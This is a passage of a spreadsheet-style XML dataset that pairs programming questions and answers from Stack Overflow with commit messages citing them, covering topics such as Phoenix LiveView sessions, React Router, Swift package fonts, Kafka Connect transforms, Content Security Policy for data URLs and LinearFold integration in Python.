The problem comes in when I consider design patterns.  The linked to thread has an interesting comment that design patterns may be used but not intentionally.  When I want to intentionally use a design pattern (in the design of my program), it feels like I'm going above and beyond what is needed, that I'm in the realm of "[external-link]" so I fall back to my traditional methods and everything goes along smoothly (i.e. normally).
Take the MVC pattern as an example.  If I want to implement this pattern using Windows Forms or ASP.NET (Visual Studio 2005) then I have to write a "Framework" and writing frameworks seems to be more trouble than it's worth for the size of the application.
Perhaps my applications are too small to justify the use of some of these patterns.
Perhaps I just don't know the patterns well enough or need to study them more.
Does anyone else experience this "architecture astronaut" feeling?
How do you go about intentionally using design patterns without going "overboard?"
</t>
  </si>
  <si>
    <t>C393</t>
  </si>
  <si>
    <t>add HomeLive
https://stackoverflow.com/questions/65357773/how-to-pass-plug-loaded-data-to-liveview-components</t>
  </si>
  <si>
    <t>I had a similar use case in my app where my plug puts the a
user
struct on  the
assigns
and I wanted to keep that data inside live view without reloading all stuff.
The only way I could achieve that was using the
option
session
from the
live
route passing it a MFA.
In the router you will have something like
live "/page", WebApp.SomeLiveView, :show, session: {WebAppp.Helpers, :keep_domain_id, []}
and your
WebApp.Helpers
will have that function returning what you want to be passed to your live view as
session
.
defmodule WebApp.Helpers do
  def keep_domain_id(conn) do
    %{"domain_id" =&gt; conn.assigns.domain_id}
  end
end
Then in your
mount
on you will have
"domain_id"
key in your
session
defmodule WebApp.WelcomeLive do
  use WebApp, :live_view
  @impl true
  def mount(_args, %{"domain_id" =&gt; domain} = _session, socket) do
    ...
  end
end</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been learning how to do multi-threading in C and wanted to use &lt;strong&gt;&amp;lt;threads.h&amp;gt;&lt;/strong&gt;. But it (my compiler GCC 8.1) says that &lt;strong&gt;&amp;lt;threads.h&amp;gt;&lt;/strong&gt; isn't a file or a directory when I wanted to compile this code :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;threads.h&amp;gt;
int main(void) {
     printf(&amp;quot;Hello World\n&amp;quot;);
     return EXIT_SUCCESS;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So yeah... a &lt;em&gt;hello world program&lt;/em&gt; but at the compile-time it doesn't work. Help me please. Also I am using &lt;strong&gt;Code::Blocks&lt;/strong&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C394</t>
  </si>
  <si>
    <t>Fix update on unmounted component
See here : https://stackoverflow.com/a/60907638/2828611</t>
  </si>
  <si>
    <t xml:space="preserve">This project started as a development platform because i wanted to be able to write games for mobile devices, but also being able to run and debug the code on my desktop machine too (ie, the EPOC device emulator was so bad): the platforms it currently supports are:
Window-desktop
WinCE
Symbian
iPhone
The architecture it's quite complete with 16bit 565 video framebuffer, blitters, basic raster ops, software pixel shaders, audio mixer with shaders (dsp fx), basic input, a simple virtual file system... although this thing is at it's first write and so there are places where some refactoring would be needed.
Everything has been abstracted away and the guiding principle are:
mostly clean code, as if it was a book to just be read
object-orientation, without sacrifying performances
mobile centric
The idea was to open source it, but without being able to manage it, i doubt the software itself would benefit from this move.. Nevertheless, i myself have learned a lot from unmaintained projects.
So, thanking you in advance for reading all this... really, what would you do?
</t>
  </si>
  <si>
    <t>C395</t>
  </si>
  <si>
    <t>Add definition list styling and &lt;Dli&gt; component
`&lt;dl&gt;` (definition list) elements are perfect for display key/value
pairs or semantically similar (question/answer, etc.).
This commit adds default styling for them, but also introduces the
`&lt;Dli&gt;` component to wrap `&lt;dt&gt;`/`&lt;dd&gt;` pairs for better styling and
semantics. This has been valid HTML since at least 2019.[1]
[1] https://stackoverflow.com/a/18269134</t>
  </si>
  <si>
    <t>This information is incorrect - div elements are regarded flow content and are very well allowed inside li elements. You might have confused it with ul/ol elements, which may only contain lis accordingly.
What has changed in HTML5 is, that it does not have block-level and inline elements anymore. Instead there is a more complex distinction of the elements into several categories.
To see what is allowed inside an element according to HTML5, see the description of the specific tag where the section "Content model" tells you which content is allowed inside this particular element.
###EDIT: addressing the confusion in the comments about list elements ### (according to HTML living standard as of 2019-07-30)
There are several types of lists - the most common ones are unordered (ul), and  ordered (ol) lists. ul and ol are the "container" elements that only hold list item (li) as child elements - no other elements are allowed*. The li element itself can contain arbitrary flow content.* (technically they are also allowed to hold ["script-supporting" elements][script]
&lt;ol&gt;
   &lt;li&gt;&lt;/li&gt;
   ...more li elements
&lt;/ol&gt;
&lt;ul&gt;
   &lt;li&gt;&lt;/li&gt;
   ...more li elements
&lt;/ul&gt;
For [description lists (dl)][dl] there used to be the same restriction that they can only contain their respective child elements dt and dd, but recent changes allow div child elements as well, as long as those divs themselves contain a dt or dd.
&lt;dl&gt;
  &lt;dt&gt;term&lt;/dt&gt;&lt;dd&gt;description&lt;/dd&gt;
&lt;/dl&gt;
// the following is now valid as well:
&lt;dl&gt;
  &lt;div&gt;&lt;dt&gt;term&lt;/dt&gt;&lt;dd&gt;description&lt;/dd&gt;&lt;/div&gt;
&lt;/dl&gt;
As a mnemonic: Container elements should only contain their respective child elements and those child elements can contain any content you like.
[script]: https://html.spec.whatwg.org/multipage/dom.html#script-supporting-elements-2) [dl]: https://html.spec.whatwg.org/multipage/grouping-content.html#the-dl-element</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have several classes (&lt;code&gt;bizMember&lt;/code&gt;, &lt;code&gt;bizParsha&lt;/code&gt;, and &lt;code&gt;bizEarningYear&lt;/code&gt;), all of which inherit from a generic base class &lt;code&gt;bizObject&amp;lt;T&amp;gt;&lt;/code&gt;. Each of these classes has a &lt;code&gt;Delete(int id)&lt;/code&gt; method that removes an item from the database.&lt;/p&gt;
&lt;p&gt;Currently, I have a &lt;code&gt;DeleteItem&lt;/code&gt; method that checks the type of the passed-in object using &lt;code&gt;is&lt;/code&gt;, then calls the appropriate &lt;code&gt;Delete&lt;/code&gt; method. However, this approach is not scalable. I want a more generic way to handle this so that I can pass in any class that inherits from &lt;code&gt;bizObject&amp;lt;T&amp;gt;&lt;/code&gt; and have it automatically call its Delete method.&lt;/p&gt;
&lt;p&gt;Hereâ€™s my current implementation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private async Task DeleteItem(object item)
{
    if (item is bizEarningYear bey)
    {
        await bey.Delete(bey.EarningYearId);
        await _viewmodelbinder.LoadEarningYearList();
    }
    else if (item is bizParsha bp)
    {
        await bp.Delete(bp.ParshaId);
        await _viewmodelbinder.LoadParshaList();
    } 
    else if (item is bizMember m)
    {
        await m.Delete(m.MemberId);
        await _viewmodelbinder.LoadMemberList();
    }
}
private async void Delete_Clicked(object sender, EventArgs e)
{
    if (sender is Button b &amp;amp;&amp;amp; await PromptBeforeDelete(b.Parent.BindingContext))
    {
        try
        {
            await DeleteItem(b.Parent.BindingContext);
        }
        catch (Exception ex)
        {
            await DisplayAlert(this.ToString(), ex.Message, &amp;quot;Close&amp;quot;);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I Need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A scalable way to remove the type-checking (is statements).&lt;/li&gt;
&lt;li&gt;A generic function that works with any bizObject and calls its
Delete method dynamically.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Constraints:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The classes (&lt;code&gt;bizMember&lt;/code&gt;, &lt;code&gt;bizParsha&lt;/code&gt;, &lt;code&gt;bizEarningYear&lt;/code&gt;) all inherit
from &lt;code&gt;bizObject&amp;lt;T&amp;gt;&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Each class has a &lt;code&gt;Delete(int id)&lt;/code&gt; method that takes the object's ID
as a parameter.&lt;/li&gt;
&lt;li&gt;I need to update a corresponding list in &lt;code&gt;_viewmodelbinder&lt;/code&gt; after
deletion.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How can I refactor &lt;code&gt;DeleteItem&lt;/code&gt; to be more generic and scalable?&lt;/p&gt;
&lt;p&gt;I attempted to use generics like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private async Task DeleteItem&amp;lt;T&amp;gt;(bizObject&amp;lt;T&amp;gt; item) where T : bizObject&amp;lt;T&amp;gt;, new() 
{
    //code here
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I ran into an issue when trying to pass the &lt;code&gt;BindingContext&lt;/code&gt; from the button click event. At the time of the event, I donâ€™t know the type of the clicked object, so I canâ€™t cast it to the correct generic type.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C396</t>
  </si>
  <si>
    <t>[RnCliProjectSandbox] Replace hard-coded attributes with props on native components
Needed to supply a shadow view for things to layout correctly.
More info here: https://stackoverflow.com/questions/61558815/react-native-native-ui-component-doent-resize-android</t>
  </si>
  <si>
    <t>I faced the same problem recently. Your need to use a shadow node to measure the final size which the TextView will have after the text was rendered.
I found a good article about this.
click me
If your TextView will render simple text only, you can just use the ReactTextShadowNode which is part of the native library of react native.
To do so just override the method createShadowNodeInstance of your ViewManager and return an instance of the ReactTextShadowNode.
override fun createShadowNodeInstance(): ReactTextShadowNode {
        return ReactTextShadowNode(null)
    }
If your TextView has to render some special Spanns, you need to write your own implementation of ShadowNode. I did so by coping the ReactTextShadowNode and changed the way how the field mPreparedSpannableText was bild. This field holds the span which will be used to measure the desired height.
eg. you could use something like that
@ReactProp(name = "text")
    fun setText(text: String?) {
        this.text = text ?: ""
        mPreparedSpannableText = useYourMethodToCreateYourSpannable()
        dirty()
    }
This post was quiet old but I hope my answer will help someone facing the same problem.</t>
  </si>
  <si>
    <t xml:space="preserve">The problem I'm having with writing a web application architecture is that I want separate components that work together.  By this I simply mean, for example, a navigation bar and the actual page content (as well as a header, which is static) in ASP.NET.
Now, here's where it gets interesting:
There are no two pages the same
The navigation pages on every page have security on them on a user-by-user basis
The navigation has links to other locations
The problem I'm mainly having is that you've usually got to have a full web page in Visual Studio, and if you have portions i.e. excluding your &lt;html&gt; tags then Visual Studio will end up underlining everything as incorrect.
The way is this application is currently being dealt with is using frames (yes, frames) to keep everything separate, but working together.  I want to move away from this, although the web system is very large, and very important in that it must be available 24/7.
Any ideas?
</t>
  </si>
  <si>
    <t>C397</t>
  </si>
  <si>
    <t>Add UI Package, Raleway font family, Raleway enum, and MediaListFont for font management
- Added the UI Package to centralize the development of UI components that will be used throughout the project.
- Added the Raleway font family files to the project.
- Created a `Raleway` enum with three weights and add two function for generating `Font` objects based on size or textStyle.
Implemented the MediaListFont struct to register and unregister fonts for loading custom fonts from Swift Package Manager.  (https://stackoverflow.com/a/63029605/5140621)</t>
  </si>
  <si>
    <t>✅ It is supported now
From Swift 5.3, you can add any resources to the target, including images, assets, fonts, zip, etc. Using the directory name will include all subfiles of the directory:
    .target(
        name: "ABUIKit",
        dependencies: [],
        resources: [.process("Resources") // &lt;- this will add Resource directory to the target
        ]
    ),
Note that you should put the Resources folder under sources/packageName to make it recognizable.
⚠️ Also, Don't forget to register them!
You need to register fonts to make it work. So you can use frameworks like FontBlaster.
NOTE: You can always write your own code, but I prefer to use an existing framework and contribute my extra needs to them
So you call this somewhere early in the module's code (like some init method):
FontBlaster.blast(bundle: .module)
Then you can use the font inside or even outside of the module!
🛑 There is no need to name the font manually!
It will register all included fonts automatically. You can double-check the loaded fonts right after calling the blast method:
FontBlaster.loadedFonts.forEach { print("🔠", $0) }</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First time asking a question here, apologies if this isn't sufficiently clear :)&lt;/p&gt;
&lt;p&gt;I have a list of &lt;code&gt;Foo&lt;/code&gt;s, where &lt;code&gt;Foo&lt;/code&gt; is some struct type imported upstream. Foo has some field &lt;code&gt;Bar&lt;/code&gt; that is a bit complicated to calculate. Historically creation of a &lt;code&gt;Foo&lt;/code&gt; has looked like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bar := someComplicatedAndBespokeBarCalculator(...)
myFoo := Foo{
    ...
    Bar: bar
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but we recently created a standardized method for calculating &lt;code&gt;Bar&lt;/code&gt;. The now-recommended design pattern is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myFooInline := Foo{
    ...
    Bar: standardizedBarCalculator(...)
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to set up a custom linter rule that parses all my &lt;code&gt;Foo&lt;/code&gt;s with the &lt;code&gt;go/ast&lt;/code&gt; library to assert that all &lt;code&gt;Foo&lt;/code&gt;s are created with the second, inline pattern such that we can ensure that no &lt;code&gt;Foo&lt;/code&gt; is created without using the &lt;code&gt;standardizedBarCalculator&lt;/code&gt;. Very possibly I'm doing something wrong, but trying to use &lt;code&gt;ast.Inspect&lt;/code&gt; and cast an &lt;code&gt;ast.Node&lt;/code&gt; into an &lt;code&gt;ast.StructType&lt;/code&gt; only seems to work when I'm defining a new struct, not when I'm instantiating an instance of an upstream-defined struct. So, I'm struggling to figure out how to do this. Any guidance would be appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C398</t>
  </si>
  <si>
    <t>Wrap component in &lt;BrowserRouter&gt; so &lt;Link&gt; works in tests
https://stackoverflow.com/a/54519524</t>
  </si>
  <si>
    <t>I'm assuming that you are using React-Router V4, as you used the same in the original Sandbox Link.
You are rendering the Main component in the call to ReactDOM.render that renders a Link and Main component is outside of Router, that's why it is throwing the error:
You should not use &lt;Link&gt; outside a &lt;Router&gt;
Changes:
Use any one of these Routers, BrowserRouter/HashRouter etc..., because you are using React-Router V4.
Router can have only one child, so wrap all the routes in a div or Switch.
React-Router V4, doesn't have the concept of nested routes, if you wants to use nested routes then define those routes directly inside that component.
Check this working example with each of these changes.
Parent Component:
const App = () =&gt; (
  &lt;BrowserRouter&gt;
    &lt;div className="sans-serif"&gt;
      &lt;Route path="/" component={Main} /&gt;
      &lt;Route path="/view/:postId" component={Single} /&gt;
    &lt;/div&gt;
  &lt;/BrowserRouter&gt;
);
render(&lt;App /&gt;, document.getElementById('root'));
Main component from route
import React from 'react';
import { Link } from 'react-router-dom';
export default () =&gt; (
  &lt;div&gt;
    &lt;h1&gt;
      &lt;Link to="/"&gt;Redux example&lt;/Link&gt;
    &lt;/h1&gt;
  &lt;/div&gt;
)
Etc.
Also check this answer: https://stackoverflow.com/questions/41474134/nested-routes-with-react-router-v4</t>
  </si>
  <si>
    <t xml:space="preserve">In a past interview, I was asked how would I write a mission critical windows service which must maintain 100% uptime, be very responsive, and also be updatable. The service was described as a remoting based application which takes in requests, performs calculations and sends a response back.
My solution was to have a very generic service which simply acts as a gateway. This service would never be stopped. It would queue up the requests and forward them on to another service in a separate app domain which would actually handle the request. There would need to be at least two of these handling services so one could be brought down to be updated while the other would responded to incoming requests. The interfaces between the services would include an ability to handshake to see if a service was running. A very small timeout would exist so if a service was completly out it wouldn't hold the request up. I also emphasized the point that this solution could scale out well as you could add more of these services on different boxes. 
The interviewer wasn't too crazy about this idea because of issues around latency between communicating across app domains and even across the network. I stated for a mission critical application you should set up a rock solid infrastructure as software alone can't be the answer. He also said they currently have a system in place using relfection. I thought about loading assemblies into an app domain and watching a directory for assembly changes, but this seems way too error prone.
Has anyone build anything with similar requirements? What solutions did you use? What doesn't work? Is reflection a usable option?
</t>
  </si>
  <si>
    <t>C399</t>
  </si>
  <si>
    <t>fix(validateDOMnesting): &lt;div&gt; cannot appear as a descendant of &lt;p&gt;
if using Typography inside a component producing a `&lt;p&gt;` this will output a validateDOMnesting warning
SOLUTION: https://stackoverflow.com/questions/41928567/div-cannot-appear-as-a-descendant-of-p</t>
  </si>
  <si>
    <t>If this error occurs while using Material UI &lt;Typography&gt; https://material-ui.com/api/typography/, then you can easily change the &lt;p&gt; to a &lt;span&gt; by changing the value of the component attribute of the &lt;Typography&gt; element :
&lt;Typography component={'span'} variant={'body2'}&gt;
According to the typography docs:
component : The component used for the root node. Either a string to use a DOM element or a component. By default, it maps the variant to a good default headline component.
So Typography is picking &lt;p&gt; as a sensible default, which you can change. May come with side effects ... worked for me.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm struggling with a jdbc source connector using io.confluent.connect.avro.AvroConverter and a Schema in the registry.
I wrote a Custom SMT which allows Connect to return a null value (tombstone) if one of the fields contains a configurable value.&lt;/p&gt;
&lt;p&gt;I already wrote a SMT for a Connector using io.confluent.connect.json.JsonSchemaConverter. where the same procedure works fine.&lt;/p&gt;
&lt;p&gt;The basic idea is to populate a compacted topic not only with data but also delete old data that is not used anymore.&lt;/p&gt;
&lt;p&gt;The Error I get is: &lt;code&gt;org.apache.kafka.connect.errors.DataException: Found null value for non-optional schema&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I tried to make the whole Avro schema nullable, I tried to make every element in the schema nullable but nothing of this sort works.&lt;/p&gt;
&lt;p&gt;The relevant part of the connect config would be:&lt;/p&gt;
&lt;pre class="lang-json prettyprint-override"&gt;&lt;code&gt;  &amp;quot;transforms&amp;quot;: &amp;quot;createKey, extractKey, selectValues&amp;quot;,
  &amp;quot;transforms.createKey.type&amp;quot;: &amp;quot;org.apache.kafka.connect.transforms.ValueToKey&amp;quot;,
  &amp;quot;transforms.createKey.fields&amp;quot;: &amp;quot;ACCOUNT&amp;quot;,
  &amp;quot;transforms.extractKey.type&amp;quot;: &amp;quot;org.apache.kafka.connect.transforms.ExtractField$Key&amp;quot;,
  &amp;quot;transforms.extractKey.field&amp;quot;: &amp;quot;ACCOUNT&amp;quot;,
  &amp;quot;transforms.selectValues.type&amp;quot;: &amp;quot;my.own.smt.ProduceNullRecordIfFieldEquals&amp;quot;,
  &amp;quot;transforms.selectValues.checkField&amp;quot;: &amp;quot;ACCOUNT_STATUS&amp;quot;,
  &amp;quot;transforms.selectValues.checkContent&amp;quot;: &amp;quot;1&amp;quot;,
  &amp;quot;key.converter&amp;quot;: &amp;quot;org.apache.kafka.connect.storage.StringConverter&amp;quot;,
  &amp;quot;value.converter&amp;quot;: &amp;quot;io.confluent.connect.avro.AvroConverter&amp;quot;,
  &amp;quot;value.converter.schema.registry.url&amp;quot;: &amp;quot;${env:SCHEMA_REGISTRY_URL}&amp;quot;,
  &amp;quot;value.converter.auto.register.schemas&amp;quot;: &amp;quot;true&amp;quot;,
  &amp;quot;value.converter.compatibility.strict&amp;quot;: &amp;quot;false&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The main part of the SMT looks like this:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;
  public R apply(R record) {
    Struct origStruct = Requirements.requireStruct(record.value(), &amp;quot;flat&amp;quot;);
    Struct targetStruct;
    if (String.valueOf(origStruct.get(this.checkField)).equals(this.checkContent)) {
      targetStruct = null;
    } else {
      targetStruct = origStruct;
    }
    return record.newRecord(
        record.topic(),
        record.kafkaPartition(),
        record.keySchema(),
        record.key(),
        record.valueSchema(),
        targetStruct,
        record.timestamp());
  }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the line of code in the AvroData.java class I have to overcome is here:
[Confluent Connect AvroData][1]&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;if (value == null &amp;amp;&amp;amp; schema != null &amp;amp;&amp;amp; !schema.isOptional()) {... log error ...}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I could set the Schema to optional, It should work. But I did not find a way yet.&lt;/p&gt;
&lt;p&gt;Any help is apreciated!&lt;/p&gt;
&lt;p&gt;BR
[1]: &lt;a href="https://github.com/confluentinc/schema-registry/blob/master/avro-data/src/main/java/io/confluent/connect/avro/AvroData.java#L1368" rel="nofollow noreferrer"&gt;https://github.com/confluentinc/schema-registry/blob/master/avro-data/src/main/java/io/confluent/connect/avro/AvroData.java#L1368&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C4</t>
  </si>
  <si>
    <t>REFACTORING. Moved the code of the components registered globally as 
'FontAwesomeIcon' to an external file inside the root of the components folder.
- You can register components globally in the main.js file, but a cleaner way, without bloating your main.js, is to import your component in an index.js file in your components folder, and later registered the components into main.js
https://stackoverflow.com/questions/52644198/registering-vue-components-globally</t>
  </si>
  <si>
    <t>This is easy to accomplish. You can register components globally in the main.js file.
import MyComponent from '@/components/MyComponent'
Vue.component('my-component-name', MyComponent)
Now you can use &lt;my-component-name /&gt; everywhere.
A cleaner way, without bloating your main.js, is to import your component in an index.js file in your components folder like this.
import Vue from 'vue'
import MyComponent from '@/components/MyComponent'
Vue.component('my-component-name', MyComponent)
Later you can add this line to your main.js to load the registered components.
import '@/components'
the docs: https://v2.vuejs.org/v2/guide/components-registration.html</t>
  </si>
  <si>
    <t xml:space="preserve">Say you have an application divided into 3-tiers: GUI, business logic, and data access. In your business logic layer you have described your business objects: getters, setters, accessors, and so on... you get the idea. The interface to the business logic layer guarantees safe usage of the business logic, so all the methods and accessors you call will validate input. 
This great when you first write the UI code, because you have a neatly defined interface that you can trust.
But here comes the tricky part, when you start writing the data access layer, the interface to the business logic does not accommodate your needs. You need to have more accessors and getters to set fields which are/used to be hidden. Now you are forced to erode the interface of your business logic; now it is possible set fields from the UI layer, which the UI layer has no business setting. 
Because of the changes needed for the data access layer, the interface to the business logic has eroded to the point where it is possible to even set the business logic with invalid data. Thus, the interface does not guarantee safe usage anymore.
I hope I explained the problem clearly enough. How do you prevent interface eroding, maintain information hiding and encapsulation, and yet still accommodate different interface needs among different layers? 
</t>
  </si>
  <si>
    <t>C40</t>
  </si>
  <si>
    <t>fix: add CSP (Content Security Policy) support for image data-blobs
It is very expensive in terms of time and amount of data
to load very small images via HTTP. Thus browsers do
support data-URLs for images. Utilizing this, small
images can be transmitted along the JavaScript, CSS or HTML.
The previous setting for the Content-Security-Policy header
did not permit such data-URLs, as these must be explicitly
named to work with major browsers like Chrome.
This commit adds necessary setting to support data-URLs in
these browsers.
see:
* https://stackoverflow.com/questions/18447970/content-security-policy-data-not-working-for-base64-images-in-chrome-28#18449556</t>
  </si>
  <si>
    <t>According to the grammar in the CSP spec, you need to specify schemes as scheme:, not just scheme. So, you need to change the image source directive to:
img-src 'self' data:;</t>
  </si>
  <si>
    <t xml:space="preserve">In Visual C++ a DWORD is just an unsigned long that is machine, platform, and SDK dependent.  However, since DWORD is a double word (that is 2 * 16), is a DWORD still 32-bit on 64-bit architectures?
</t>
  </si>
  <si>
    <t>C400</t>
  </si>
  <si>
    <t>camel-netty - Fix doc about SSL configuration
## Motivation
[Someone from the community](https://stackoverflow.com/questions/76991186/cannot-resolve-method-setsslcontextparameters-in-nettycomponent) raised the fact that the code snippet describing how to configure SSL in the netty component is invalid/outdated and should be fixed.
## Modifications:
* Set the SSL configuration from the `NettyConfiguration` instead of `NettyComponent`</t>
  </si>
  <si>
    <t>I'm trying to adding ssl support to the programe In camel.But I'm getting error as "Cannot resolve method 'setSslContextParameters' in 'NettyComponent'" .
&lt;!-- https://mvnrepository.com/artifact/org.apache.camel/camel-netty --&gt;
    &lt;dependency&gt;
        &lt;groupId&gt;org.apache.camel&lt;/groupId&gt;
        &lt;artifactId&gt;camel-netty&lt;/artifactId&gt;
        &lt;version&gt;3.21.0&lt;/version&gt;
    &lt;/dependency&gt;
these are my camel and netty version. Have any idea about resolving this issue. camel version is 3.21.0.
KeyStoreParameters ksp = new KeyStoreParameters();
            ksp.setResource("/users/home/server/keystore.jks");
            ksp.setPassword("keystorePassword");
            KeyManagersParameters kmp = new KeyManagersParameters();
            kmp.setKeyStore(ksp);
            kmp.setKeyPassword("keyPassword");
            SSLContextParameters scp = new SSLContextParameters();
            scp.setKeyManagers(kmp);
            NettyComponent nettyComponent = getContext().getComponent("netty", NettyComponent.class);
            nettyComponent.setSslContextParameters(scp);</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings, 
Apologies in advance that I have not researched this toughly enough to answer the question myself, but I imagine it would take me some time and I would rather know now before I invest more time in learning it. I couldn't find anything in my initial research..
Why use ASP.Net MVC if your already using a multi-tier architecture (Data Layer, Logic Layer, Presentation Layer)? Other than the fact the controller has more power than the logic layer. 
Am I right in thinking I can use nHibernate and all my data access classes, entities, and mappings in the Model part of the MVC?  
When using controllers, is it best to separate a lot of the logic into a separate class so I can call it from multiple controllers? Or can I call them from the controllers themselves, considering the fact that I would not want all of them to be Actions, just normal methods.
Thanks
</t>
  </si>
  <si>
    <t>C401</t>
  </si>
  <si>
    <t>Use TOX_SKIP_ENV for smarter CI jobs
Use a negative lookup regeix in the TOX_SKIP_ENV variable
to skip all tox testenvs that won't match the python version
that is set up for each CI job.
This should increase test efficiency, since trytond database
caches can be reused across testenvs, and also simplifies
the CI job script readability keeping it agnostic of the
underlying tox dependency matrix.
See https://stackoverflow.com/a/70955892/11715259</t>
  </si>
  <si>
    <t>You could negate a regex pattern for the
TOX_SKIP_ENV
as the following:
$ env TOX_SKIP_ENV='.*[^-framework2]$' tox
tox4
, which will be introduced within the next couple of months, introduces
labels
. While this may be not an immediate help for your problem, maybe you see a way to simplify your
tox.ini
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am modifying &lt;code&gt;bpps.py&lt;/code&gt; in the &lt;a href="https://github.com/DasLab/arnie" rel="nofollow noreferrer"&gt;Arnie&lt;/a&gt; Python package to integrate &lt;strong&gt;LinearFold&lt;/strong&gt; for RNA secondary structure predictions. However, I keep encountering &lt;strong&gt;&amp;quot;KeyError: 'linearfold_v'&amp;quot;&lt;/strong&gt;, and issues when running &lt;code&gt;bpps.py&lt;/code&gt;, even though all dependencies appear to be installed correctly.&lt;/p&gt;
&lt;p&gt;To debug, I am working with the following files:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;bpps.py&lt;/code&gt;&lt;/strong&gt; â€“ Contains the main logic for base-pairing probability calculations. This file handles package selection and calls external RNA secondary structure prediction tools.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;arnie_config.txt&lt;/code&gt;&lt;/strong&gt; â€“ Registers paths to RNA folding executables (e.g., ViennaRNA, LinearFold, etc.). This is where I define locations for &lt;strong&gt;LinearFold binaries&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;package_options.py&lt;/code&gt;&lt;/strong&gt; â€“ Defines available packages and how they are processed in &lt;code&gt;bpps.py&lt;/code&gt;. It should contain mappings for &lt;strong&gt;LinearFold and LinearPartition&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Despite ensuring that all required dependencies are installed and accessible, I still get &lt;code&gt;KeyError: 'linearfold_v'&lt;/code&gt; when calling &lt;strong&gt;bpps(seq, package=&amp;quot;linearfold_v&amp;quot;)&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Ensured LinearFold is Installed and Accessible&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;My &lt;strong&gt;&lt;code&gt;linearfold_v&lt;/code&gt; binary&lt;/strong&gt; is located at:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/home/vboxuser/LinearFold/bin/linearfold_v
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Similarly, &lt;code&gt;linearfold_c&lt;/code&gt;, &lt;code&gt;linearfold_e&lt;/code&gt;, and &lt;code&gt;linearpartition_*&lt;/code&gt; are in their respective locations.&lt;/p&gt;
&lt;p&gt;To interface with LinearFold, I added the following function in &lt;code&gt;bpps.py&lt;/code&gt; (the entire code is included at the bottom:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;def bpps_linearfold(sequence):
    &amp;quot;&amp;quot;&amp;quot;Run LinearFold on a sequence and return base-pairing probabilities.&amp;quot;&amp;quot;&amp;quot;
    import subprocess
    linearfold_path = &amp;quot;/home/vboxuser/LinearFold/bin/linearfold_v&amp;quot;
    command = [linearfold_path, &amp;quot;--prob&amp;quot;, sequence]
    process = subprocess.run(command, text=True, capture_output=True)
    if process.returncode != 0:
        raise RuntimeError(f&amp;quot;LinearFold failed: {process.stderr}&amp;quot;)
    return process.stdout
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function runs &lt;strong&gt;without errors&lt;/strong&gt; when executed independently.&lt;/p&gt;
&lt;hr /&gt;
&lt;h3&gt;&lt;strong&gt;2. Updated &lt;code&gt;bpps.py&lt;/code&gt; to Recognize LinearFold&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;To integrate LinearFold, I updated &lt;code&gt;bpps.py&lt;/code&gt; to &lt;strong&gt;process &lt;code&gt;linearfold_v&lt;/code&gt; correctly&lt;/strong&gt;:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;if linear:
    print(f&amp;quot;DEBUG: Linear is set to True, checking package: {package}&amp;quot;)
    if package in [&amp;quot;linearfold_v&amp;quot;, &amp;quot;linearfold_c&amp;quot;, &amp;quot;linearfold_e&amp;quot;]:
        print(f&amp;quot;DEBUG: Calling bpps_linearfold with {package}&amp;quot;)
        return bpps_linearfold(sequence)
    elif package in [&amp;quot;linearpartition_v&amp;quot;, &amp;quot;linearpartition_c&amp;quot;, &amp;quot;linearpartition_e&amp;quot;]:
        print(f&amp;quot;DEBUG: Calling bpps_linearpartition with {package}&amp;quot;)
        return bpps_linearpartition(sequence, tmp_file)
    else:
        print(f&amp;quot;DEBUG: Unexpected package {package} for linear processing!&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, calling:&lt;/p&gt;
&lt;pre class="lang-py prettyprint-override"&gt;&lt;code&gt;# test_bpps.py
from arnie.bpps import bpps
# Test sequence
